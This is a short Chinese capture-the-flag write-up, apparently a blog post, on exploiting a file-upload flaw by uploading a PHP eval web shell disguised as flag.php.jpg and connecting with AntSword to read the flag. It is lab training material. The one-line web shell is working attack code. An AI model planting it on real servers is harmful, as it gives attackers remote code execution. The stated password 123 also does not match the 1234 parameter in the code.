题目
1.打开靶机
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
2.创建一个脚本文件
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
3上传后复制文件get请求的链接并打开蚁剑
连接密码为123
双击链接
4,查找'/'在最下面找到flag文件
5,打开文件得到flag
相关推荐
Y学院21 小时前
虚拟机安装ParrotOS完整教程(VMware+VirtualBox双版本)程序猿编码1 天前
给Linux程序穿“隐身衣”——ELF运行时加密器全解析(C/C++代码实现)一名优秀的码农1 天前
vulhub系列-74-Hackable III(超详细)PinTrust SSL证书1 天前
Sectigo(Comodo)企业型OV通配符SSL一只鼠标猴1 天前
甲方安全运营:漏洞整改推动实操指南Suckerbin1 天前
vulnyx-Debug靶场渗透藤原千花的败北1 天前
PHP对象注入(PHP反序列化漏洞)Suckerbin1 天前
vulnyx-Memory靶场渗透酿情师1 天前
记第一次打春秋云境-Initial 靶场(没打完,记录一下,不是WP!!!)菩提小狗2 天前
每日安全情报报告 · 2026-04-20